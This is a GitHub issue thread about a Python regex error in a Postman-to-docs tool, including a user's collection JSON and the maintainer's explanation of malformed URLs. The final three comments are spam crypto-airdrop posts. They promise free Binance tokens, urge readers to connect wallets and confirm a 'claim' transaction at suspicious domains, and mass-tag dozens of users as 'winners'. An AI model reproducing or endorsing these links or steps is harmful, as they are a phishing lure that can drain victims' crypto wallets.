### ISSUE TITLE
AttributeError: 'NoneType' object has no attribute 'group'

### ISSUE THREAD

**Issue by chamoda** [Avinash-Raj/docs-from-POSTMAN#4]
I'm getting following error

```
Traceback (most recent call last):
  File "docs.py", line 226, in <module>
    main()
  File "docs.py", line 174, in main
    base_api_path = re.search(r'^([^,]+)[^,]*(?:,\1[^,]*)*$', ','.join(urls)).group(1)
AttributeError: 'NoneType' object has no attribute 'group'
```

**Comment by Avinash-Raj** [comment]
@chamoda Thanks for creating an issue. Pls post the output of `urls` variable.

**Comment by chamoda** [comment]
@Avinash-Raj  Here's an example output which cause the error

```
{
    "id": "45962ea4-f59d-844a-575e-62c980677167",
    "name": "Test",
    "description": "",
    "order": [
        "d369ad36-6b5d-bf9d-60ff-9c49380dce95",
        "4b0f8c3a-3192-5f50-e203-0982e00a02e9",
        "ebd75399-02a0-f7c0-f538-f238a786e237",
        "2762ecba-9ec1-3e0e-a9b1-6120aa6fb06a",
        "c40a3138-abff-af1c-1559-b26bf1d97253"
    ],
    "folders": [],
    "timestamp": 1466227904242,
    "owner": "14416",
    "remoteLink": "",
    "public": false,
    "requests": [
        {
            "id": "2762ecba-9ec1-3e0e-a9b1-6120aa6fb06a",
            "headers": "",
            "url": "http://example.com/api/v1/brands.php",
            "preRequestScript": null,
            "pathVariables": {},
            "method": "GET",
            "data": null,
            "dataMode": "params",
            "version": 2,
            "tests": null,
            "currentHelper": "normal",
            "helperAttributes": {},
            "time": 1468565000735,
            "name": "http://192.168.1.190/api/v1/brands.php",
            "description": "",
            "collectionId": "45962ea4-f59d-844a-575e-62c98067716f",
            "responses": []
        },
        {
            "id": "4b0f8c3a-3192-5f50-e203-0982e00a02e9",
            "headers": "",
            "url": "192.168.1.190/api/v1/auth.php",
            "preRequestScript": null,
            "pathVariables": {},
            "method": "POST",
            "data": [],
            "dataMode": "raw",
            "version": 2,
            "tests": null,
            "currentHelper": "normal",
            "helperAttributes": {},
            "time": 1466246196205,
            "name": "192.168.1.190/api/v1/register.php",
            "description": "",
            "collectionId": "45962ea4-f59d-844a-575e-62c98067716f",
            "responses": [],
            "rawModeData": "{\n   \"email\": \"user@example.com\",\n   \"password\": \"12345678\",\n   \"first_name\": \"Test\",\n   \"last_name\": \"Test\",\n   \"phone_number\": \"number\",\n   \"company\": \"test\",\n   \"address_line1\": \"line1\",\n   \"city\": \"Test\",\n   \"district\": \"Test\",\n   \"country\": \"Test\",\n   \"province\": \"Test\",\n   \"lat\": 1,\n   \"lon\": 1\n}"
        },
        {
            "id": "c40a3138-abff-af1c-1559-b26bf1d97253",
            "headers": "X-Auth-Token: 3618b0d5f7a64ef4ed101de408abd746\n",
            "url": "http://192.168.1.190/api/v1/change_password.php",
            "pathVariables": {},
            "preRequestScript": null,
            "method": "POST",
            "collectionId": "45962ea4-f59d-844a-575e-62c98067716f",
            "data": [],
            "dataMode": "raw",
            "name": "http://192.168.1.190/api/v1/change_password.php",
            "description": "",
            "descriptionFormat": "html",
            "time": 1468541287225,
            "version": 2,
            "responses": [],
            "tests": null,
            "currentHelper": "normal",
            "helperAttributes": {},
            "rawModeData": "{\n\"current_password\": \"12345678\",\n\"new_password\": \"1234567890\"\n}"
        },
        {
            "id": "d369ad36-6b5d-bf9d-60ff-9c49380dce95",
            "headers": "",
            "url": "192.168.1.190/api/v1/auth.php",
            "pathVariables": {},
            "preRequestScript": null,
            "method": "POST",
            "collectionId": "45962ea4-f59d-844a-575e-62c98067716f",
            "data": [],
            "dataMode": "raw",
            "name": "192.168.1.190/api/v1/auth.php",
            "description": "",
            "descriptionFormat": "html",
            "time": 1466246186117,
            "version": 2,
            "responses": [],
            "tests": null,
            "currentHelper": "normal",
            "helperAttributes": {},
            "rawModeData": "{\n   \"email\": \"user@example.com\",\n   \"password\": \"12345678\"\n}"
        },
        {
            "id": "ebd75399-02a0-f7c0-f538-f238a786e237",
            "headers": "",
            "url": "http://192.168.1.190/api/v1/adverts.php",
            "preRequestScript": null,
            "pathVariables": {},
            "method": "GET",
            "data": null,
            "dataMode": "params",
            "tests": null,
            "currentHelper": "normal",
            "helperAttributes": {},
            "time": 1467165561122,
            "name": "http://172.20.10.3/api/v1/adverts.php",
            "description": "",
            "collectionId": "45962ea4-f59d-844a-575e-62c98067716f",
            "responses": []
        }
    ]
}
```

**Comment by Avinash-Raj** [comment]
@chamoda pls post the postman collections url link ..

**Comment by chamoda** [comment]
@Avinash-Raj here's the url https://www.getpostman.com/collections/51e48ecd7f2ea0e730b0

**Comment by Avinash-Raj** [comment]
@chamoda I saw these two urls in your collection response `u'http://autoadcast.dev/api/v1/brands.php', u'192.168.1.190/api/v1/auth.php'` which is in-appropriate . 

Your request urls are

```
[u'http://autoadcast.dev/api/v1/brands.php', u'192.168.1.190/api/v1/auth.php', u'http://192.168.1.190/api/v1/change_password.php', u'192.168.1.190/api/v1/auth.php', u'http://192.168.1.190/api/v1/adverts.php']
```

This python file should work only if 

 All the serving urls are served by a single server or domain. Take for example, domains in   `u'http://autoadcast.dev/api/v1/brands.php'` and `u'http://192.168.1.190/api/v1/adverts.php` urls are different. 

And also you missed `http://` in the second url. So please recreate a new collection url with the above mentioned errors removed.

So remove the API which calls `'http://autoadcast.dev/api/v1/brands.php'` url , add `http://` to the second API and don't create  duplicate (see, you have created two calls for auth service) .

**Comment by chamoda** [comment]
@Avinash-Raj Will check, thanks

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by highpolar-shubham** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @MJazz225, @Tames5, @yahahaff, @Lojzicek, @TarasKasian, @jingwez7, @hayatibis, @abelayalew, @mikemelon, @qraxiss, @farukuzun, @Anotherlynn, @jaysonkim, @mdcpanama22, @pakchu, @ZeroDY, @bilalkhann16, @arenouf14, @quinnwong31, @shi891018, @Hoanvq, @yicm, @unbb, @klich3, @esonbest, @ilkayDevran, @lf-data, @rt1e, @boomstack, @shispt, @jchen8tw, @sushant3095, @Bilitubbies, @dandymi, @Horizont19, @xl9211, @george-cpp, @schefizer, @Uniquemana, @kent-pawar, @Colt-M1873, @Awaonyeaborezekiel, @hitflame, @lucianovasso, @bnwangwei, @el-cheshire, @sxhqhb, @satosato23, @jhonathascesar232, @CouchpotatoMiner

**Comment by highpolar-shubham** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @moerv9, @frogzjx, @ErinGe, @bengdan, @deadkff01, @dumaaan, @AashayBhupendraDoshi, @uguryanik, @jamneck, @lingtingSir, @Martin2310, @fyytycoon, @zywang624, @Weltolk, @ricklitong, @Liuxw17, @tinhb92, @Othella, @arsalandehghani, @PlinMartinez, @superstevez, @kyochikuto, @slarkgames-ol, @RockChinQ, @mhorlacher, @oudommeas, @gipnomag, @Leo2021zzz, @tianqihou, @vivishko, @blaushild, @MaksimOsokin, @giranntu, @arks22, @dengjiang123, @nickyu627, @JerryZJJJ, @Akiqqqqqqq, @lilyorlucy, @mikolajskalka, @MinaBasem, @atigbadr, @kiras0518, @xuncanzhe, @TahirJalilov, @LeonLusic, @farsh4d, @420kk, @richardodliu, @grayguest
